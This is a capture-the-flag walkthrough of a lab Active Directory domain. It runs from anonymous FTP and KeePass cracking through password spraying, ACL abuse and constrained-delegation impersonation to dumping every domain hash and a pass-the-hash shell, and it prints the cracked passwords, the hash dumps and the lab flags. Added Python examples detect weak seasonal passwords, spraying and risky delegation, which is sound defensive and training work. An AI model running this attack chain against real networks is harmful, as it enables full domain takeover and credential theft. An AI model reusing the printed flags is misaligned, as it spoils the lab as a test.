Enumeration

- Change /etc/hosts and /etc/krb5.conf
Port 21
- Nmap scan showed that we have anonymous access to the ftp share.

- Let’s download all the files and see what we have found.
CyberAudit.txt
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS
Training Agenda

This file gave us a hint that only 7 attendees were at the Weak Password session.
Resource Development
Let’s create a password list from this to crack the master password of the kdbx file.
sudo vim wordlist.txt
Winter
Summer
Autumn
Fall
for i in $(cat wordlist.txt); do echo "$i"; echo "${i}2022"; echo "${i}2023"; echo "${i}2024"; done > t
vim append_exclamation.rule
:
$!
hashcat --force t -r append_exclamation.rule -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words.txt
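The wordlist above is built from one weak pattern: a season, a year and an appended symbol, with best64 supplying case and leet variants. The same pattern is what a password filter on the defending side should reject, which the audit's "prompt users to change their passwords: DONE" step evidently did not. The following Python check is an added example, not part of this write-up; it covers the Season+Year+suffix form used here and generalises it to leet substitutions and two-digit years. Adding "Spring" to the season list and the leet map are assumptions of this example.

```python
import re
from typing import Optional

# Season words. The write-up's wordlist has Winter/Summer/Autumn/Fall;
# "Spring" is added here (assumption) so the filter covers the whole set.
SEASONS = ("winter", "spring", "summer", "autumn", "fall")

# Leet alternatives per letter, mirroring the substitutions rule files
# such as best64 apply (assumed mapping, not taken from the rule file).
_LEET = {
    "a": "[a@4]", "e": "[e3]", "i": "[i1!|]", "l": "[l1|]",
    "o": "[o0]", "s": "[s$5]", "t": "[t7+]",
}


def _leet_pattern(word: str) -> str:
    """Regex fragment matching `word` and its leet-substituted spellings."""
    return "".join(_LEET.get(c, re.escape(c)) for c in word)


# <season><optional 1-4 digits (year)><optional trailing symbols>
_SEASONAL_RE = re.compile(
    r"^(?P<season>" + "|".join(_leet_pattern(s) for s in SEASONS) + r")"
    r"(?P<year>\d{1,4})?"
    r"(?P<suffix>[^A-Za-z0-9]*)$",
    re.IGNORECASE,
)


def weak_seasonal_reason(password: str) -> Optional[str]:
    """Return a human-readable reason if the password follows the seasonal
    pattern, otherwise None."""
    m = _SEASONAL_RE.match(password)
    if not m:
        return None
    parts = [f"season word '{m.group('season')}'"]
    if m.group("year"):
        parts.append(f"year-like digits '{m.group('year')}'")
    if m.group("suffix"):
        parts.append(f"trailing symbols '{m.group('suffix')}'")
    return "seasonal pattern: " + " + ".join(parts)


def screen_passwords(candidates) -> dict:
    """Map each rejected candidate to the reason it was rejected."""
    results = {}
    for pw in candidates:
        reason = weak_seasonal_reason(pw)
        if reason:
            results[pw] = reason
    return results


if __name__ == "__main__":
    # Constructed candidates: the cracked value from this box plus variants
    # a rule engine would generate, and two non-seasonal controls.
    for pw, why in screen_passwords(
        ["Fall2024!", "W1nt3r24!!", "Autumn", "Fallout2024", "Tr0ub4dor&3"]
    ).items():
        print(f"{pw:<14} rejected: {why}")
```

Wire `weak_seasonal_reason` into whatever password-change hook or breached-password screening the domain already has; a filter that only enforces length and complexity accepts every line hashcat wrote to hashcat_words.txt.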
Password Cracking
john Shared_keepass --wordlist=../hashcat_words.txt
- We cracked the password: Fall2024!
- We use this password to open the database file.
- We found some more credentials:

| Username | Password |
|---|---|
| Timesheet | hMFS4I0Kj8Rcd62vqi5X |
| Payroll | cVkqz4bCM7kJRSNlgx2G |
| FTPUser | SguPZBKdRyxWzvXRWy6U |
| Administrator | Spdv41gg4BlBgSYIW1gF |
| Wordpress Panel | cn4KOEgsHqvKXPjEnSD9 |
| SQLGuest | zDPBpaF4FywlqIv11vii |
Port 1433
- We have a password for SQLGuest. Running the nmap scan again showed port 1433 open; it is unclear why it did not show up in our previous scan.

- Logged in with mssqlclient
- The hash captured via xp_dirtree was not crackable
- No impersonation rights
- Built a user list using RID brute force
nxc mssql 10.10.91.240 -u SQLGuest -p 'zDPBpaF4FywlqIv11vii' --local-auth --rid-brute 2000
- Password sprayed the resulting user list with the wordlist.
Port 445
nxc smb 10.10.91.240 -u users_new.txt -p hashcat_words.txt
- Found a new user
redelegate.vl\Marie.Curie:Fall2024!
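The spray above is loud from the domain controller's point of view: one source address fails against many distinct accounts within seconds, then succeeds on one of them. The following Python detector is an added example, not part of this write-up. It runs over constructed Security-log records (event 4625 failed logon, 4624 successful logon; the field names follow the Windows event schema, the addresses and timestamps are made up) and reports any source that touched at least `min_accounts` accounts inside the window, together with the accounts it then logged into.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def sample_events() -> list:
    """Constructed Security-log sample (not captured from the lab): six failures
    from one address against six accounts, one success, plus a benign user who
    mistyped twice from another address."""
    src = "10.10.14.5"  # assumed spraying host
    sprayed = ["Christine.Flanders", "Marie.Curie", "Helen.Frost",
               "Michael.Pontiac", "Mallory.Roberts", "James.Dinkleberg"]
    events = []
    for i, user in enumerate(sprayed):
        events.append({"EventID": 4625, "TargetUserName": user, "IpAddress": src,
                       "Status": "0xC000006A",  # bad password
                       "TimeCreated": f"2024-10-20T09:00:{i:02d}"})
    events.append({"EventID": 4624, "TargetUserName": "Marie.Curie", "IpAddress": src,
                   "TimeCreated": "2024-10-20T09:00:07"})
    benign = "10.10.10.20"
    events += [
        {"EventID": 4625, "TargetUserName": "Ryan.Cooper", "IpAddress": benign,
         "Status": "0xC000006A", "TimeCreated": "2024-10-20T09:01:00"},
        {"EventID": 4625, "TargetUserName": "Ryan.Cooper", "IpAddress": benign,
         "Status": "0xC000006A", "TimeCreated": "2024-10-20T09:01:05"},
        {"EventID": 4624, "TargetUserName": "Ryan.Cooper", "IpAddress": benign,
         "TimeCreated": "2024-10-20T09:01:10"},
    ]
    return events


def _t(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["TimeCreated"])


def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Return one finding per source IP whose failed logons cover at least
    `min_accounts` distinct accounts inside any `window`-long interval."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["IpAddress"]].append(ev)

    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=_t)
        failures = [e for e in evs if e["EventID"] == 4625]

        # Sliding window over the failures, tracking distinct target accounts.
        in_window: dict = {}
        lo = 0
        peak_users: set = set()
        for ev in failures:
            user = ev["TargetUserName"].lower()
            in_window[user] = in_window.get(user, 0) + 1
            while _t(ev) - _t(failures[lo]) > window:
                old = failures[lo]["TargetUserName"].lower()
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            if len(in_window) > len(peak_users):
                peak_users = set(in_window)

        if len(peak_users) < min_accounts:
            continue
        sprayed = {e["TargetUserName"].lower() for e in failures}
        compromised = sorted({e["TargetUserName"].lower() for e in evs
                              if e["EventID"] == 4624
                              and e["TargetUserName"].lower() in sprayed})
        findings.append({"source_ip": ip,
                         "distinct_accounts": len(peak_users),
                         "compromised": compromised})
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(sample_events()):
        print(f"spray from {f['source_ip']}: {f['distinct_accounts']} accounts, "
              f"successful logon as {f['compromised'] or 'none'}")
```

The benign address is not reported because two failures against a single account never reach the distinct-account threshold; tune `window` and `min_accounts` to the size of the domain rather than to this six-account sample.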
Port 389
nxc ldap 10.10.91.240 -u 'Marie.Curie' -p 'Fall2024!' --bloodhound -c All -d redelegate.vl --dns-server 10.10.91.240
- Ryan.Cooper is the Domain Admin
- Marie.Curie can change the password of Helen.Frost
- Helen.Frost can PS Remote to FS01.redelegate.vl and has GenericAll rights over it
Constrained Delegation
bloodyAD --host '10.10.118.16' -d "redelegate.vl" -u "Marie.curie" -p 'Fall2024!' set password 'Helen.Frost' 'Password123!'
bloodyAD --host '10.10.118.16' -d "redelegate.vl" -u "Helen.Frost" -p 'Password123!' set password 'FS01$' 'Password123!'
- Helen.Frost has GenericAll on FS01
- We also have the SeEnableDelegationPrivilege
- We can change FS01's password using GenericAll and then use that privilege to configure FS01 for constrained delegation.
./bloodyAD.py -u 'Helen.Frost' -d 'redelegate.vl' -p 'Password123!' --host 'DC.redelegate.vl' add uac 'fs01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
modify.ldif:
dn: CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL
changetype: modify
add: msDS-AllowedToDelegateTo
msDS-AllowedToDelegateTo: ldap/dc.redelegate.vl
sudo apt-get install libsasl2-modules-gssapi-mit
kinit Helen.Frost
kvno ldap/dc.redelegate.vl
ldapmodify -H ldap://dc.redelegate.vl -Y GSSAPI -f modify.ldif
Check that it all worked:
findDelegation.py 'redelegate.vl'/'fs01$:Password123!'
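findDelegation.py reads the two attributes the steps above changed: the `TRUSTED_TO_AUTH_FOR_DELEGATION` bit (0x1000000) in userAccountControl and the SPN list in msDS-AllowedToDelegateTo. A defender can audit the same attributes from an LDAP export. The Python audit below is an added example, not part of this write-up or of any tool it uses: it works over constructed object records that mirror the FS01 configuration, skips domain controllers (which carry SERVER_TRUST_ACCOUNT and are trusted for delegation by design), and rates a constrained-delegation entry by whether protocol transition is enabled and whether the target is a DC or a high-value service. The WEB01$ and SQL01$ objects, the high-value service list and the severity scale are assumptions of the example.

```python
# userAccountControl bits relevant to delegation (ADS_USER_FLAG_ENUM values).
WORKSTATION_TRUST_ACCOUNT      = 0x00001000
SERVER_TRUST_ACCOUNT           = 0x00002000   # domain controllers
TRUSTED_FOR_DELEGATION         = 0x00080000   # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000   # protocol transition (the flag set above)

_FLAG_NAMES = {
    WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    TRUSTED_FOR_DELEGATION: "TRUSTED_FOR_DELEGATION",
    TRUSTED_TO_AUTH_FOR_DELEGATION: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Services whose tickets hand over the host (or, for ldap on a DC, the directory).
# Assumed list for this example.
HIGH_VALUE_SERVICES = {"ldap", "cifs", "host", "wsman", "mssqlsvc", "rpcss"}


def uac_flags(uac: int) -> list:
    """Names of the delegation-relevant bits set in a userAccountControl value."""
    return [name for bit, name in _FLAG_NAMES.items() if uac & bit]


def _spn_parts(spn: str):
    service, _, rest = spn.partition("/")
    host = rest.split(":")[0].split("/")[0]   # strip :port and /instance
    return service.lower(), host.lower()


def _is_high_value(spn: str, dc_hosts: set) -> bool:
    service, host = _spn_parts(spn)
    return host in dc_hosts or service in HIGH_VALUE_SERVICES


def audit_delegation(objects, dc_hosts) -> list:
    """Rate every non-DC account that is configured for delegation."""
    dc_hosts = {h.lower() for h in dc_hosts}
    findings = []
    for obj in objects:
        uac = int(obj.get("userAccountControl", 0))
        name = obj["sAMAccountName"]
        if uac & SERVER_TRUST_ACCOUNT:
            continue   # DCs are expected to delegate; review them separately
        if uac & TRUSTED_FOR_DELEGATION:
            findings.append({"account": name, "kind": "unconstrained",
                             "severity": "high", "transition": False, "targets": []})
        targets = obj.get("msDS-AllowedToDelegateTo", [])
        if not targets:
            continue
        transition = bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION)
        risky = [spn for spn in targets if _is_high_value(spn, dc_hosts)]
        if transition and risky:
            severity = "high"      # any user can be impersonated to a DC/high-value service
        elif transition or risky:
            severity = "medium"
        else:
            severity = "low"
        findings.append({"account": name, "kind": "constrained", "severity": severity,
                         "transition": transition, "targets": list(targets)})
    return findings


def sample_objects() -> list:
    """Constructed LDAP export (attribute names are real, values assumed):
    FS01$ as left by the steps above, a DC, and two hypothetical hosts."""
    return [
        {"sAMAccountName": "FS01$",
         "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
         "msDS-AllowedToDelegateTo": ["ldap/dc.redelegate.vl"]},
        {"sAMAccountName": "DC$",
         "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
        {"sAMAccountName": "WEB01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
         "msDS-AllowedToDelegateTo": ["http/intranet.redelegate.vl"]},
        {"sAMAccountName": "SQL01$",
         "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    ]


if __name__ == "__main__":
    for f in audit_delegation(sample_objects(), ["dc.redelegate.vl"]):
        print(f"{f['severity']:<6} {f['kind']:<13} {f['account']:<8} "
              f"transition={f['transition']} targets={f['targets']}")
```

FS01$ rates high for exactly the reason the attack works: protocol transition plus an ldap SPN on the DC lets the account obtain a DC service ticket for any user, which is what getST.py then does. A computer account that merely delegates to an ordinary web service without transition rates low.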

getST.py 'redelegate.vl/fs01$'@dc.redelegate.vl -spn ldap/dc.redelegate.vl -impersonate dc
secretsdump.py -k -no-pass dc.redelegate.vl -dc-ip 10.10.118.16
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a066fbf49e79f43fffc449810227e399:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:4867f8a87223e7d40393a7d9fc06f483:::
FS01$:1103:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:b9ba5bb3ea3310c94d87640cf63333b3b00fa5268cbd58e5ef898d286c9352de
Administrator:aes128-cts-hmac-sha1-96:1406919aa75dbe037f14a74e200442c5
Administrator:des-cbc-md5:cb6e8f6743527a89
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
Christine.Flanders:aes256-cts-hmac-sha1-96:ceb5854b48f9b203b4aa9a8e0ac4af28b9dc49274d54e9f9a801902ea73f17ba
Christine.Flanders:aes128-cts-hmac-sha1-96:e0fa68a3060b9543d04a6f84462829d9
Christine.Flanders:des-cbc-md5:8980267623df2637
Marie.Curie:aes256-cts-hmac-sha1-96:616e01b81238b801b99c284e7ebcc3d2d739046fca840634428f83c2eb18dbe8
Marie.Curie:aes128-cts-hmac-sha1-96:daa48c455d1bd700530a308fb4020289
Marie.Curie:des-cbc-md5:256889c8bf678910
Helen.Frost:aes256-cts-hmac-sha1-96:6df13a248e2ce1460004d7dcce5c4f8a30ea2c53e2c7d3ef712410f102cacf61
Helen.Frost:aes128-cts-hmac-sha1-96:884020e4824c0f50e596ba7a5d635634
Helen.Frost:des-cbc-md5:1a26f249a80d70df
Michael.Pontiac:aes256-cts-hmac-sha1-96:eca3a512ed24bb1c37cd2886ec933544b0d3cfa900e92b96d056632a6920d050
Michael.Pontiac:aes128-cts-hmac-sha1-96:53456b952411ac9f2f3e2adf433ab443
Michael.Pontiac:des-cbc-md5:833dc82fab76c229
Mallory.Roberts:aes256-cts-hmac-sha1-96:c9ad270adea8746d753e881692e9a75b2487a6402e02c0c915eb8ac6c2c7ab6a
Mallory.Roberts:aes128-cts-hmac-sha1-96:40f22695256d0c49089f7eda2d0d1266
Mallory.Roberts:des-cbc-md5:cb25a726ae198686
James.Dinkleberg:aes256-cts-hmac-sha1-96:c6cade4bc132681117d47dd422dadc66285677aac3e65b3519809447e119458b
James.Dinkleberg:aes128-cts-hmac-sha1-96:35b2ea5440889148eafb6bed06eea4c1
James.Dinkleberg:des-cbc-md5:83ef38dc8cd90da2
Ryan.Cooper:aes256-cts-hmac-sha1-96:d94424fd2a046689ef7ce295cf562dce516c81697d2caf8d03569cd02f753b5f
Ryan.Cooper:aes128-cts-hmac-sha1-96:48ea408634f503e90ffb404031dc6c98
Ryan.Cooper:des-cbc-md5:5b19084a8f640e75
sql_svc:aes256-cts-hmac-sha1-96:1decdb85de78f1ed266480b2f349615aad51e4dc866816f6ac61fa67be5bb598
sql_svc:aes128-cts-hmac-sha1-96:88f45d60fa053d62160e8ea8f1d0231e
sql_svc:des-cbc-md5:970d6115d3f4a43b
DC$:aes256-cts-hmac-sha1-96:3247dc574df4f4e2e82b09277c4284a0f467f5bb5f7c89df6ff0b5fe8f014c8b
DC$:aes128-cts-hmac-sha1-96:8d4768055e1f97421fdec78c047ed43e
DC$:des-cbc-md5:315bd35d8a7ca73b
FS01$:aes256-cts-hmac-sha1-96:c8142b9998787102dc1d596190bc28b16a1787f24e956d0a204077efc31117ba
FS01$:aes128-cts-hmac-sha1-96:48bcef06410264d5d28d91d7d8eb7cd1
FS01$:des-cbc-md5:1f8058fde68a58df
evil-winrm -i 10.10.118.16 -u Administrator -H a066fbf49e79f43fffc449810227e399
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
VL{3e75af0ec54eb6c3da6989cb61b50598}
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> cat user.txt
VL{036daaf2f72c183cc4ec89824b40f076}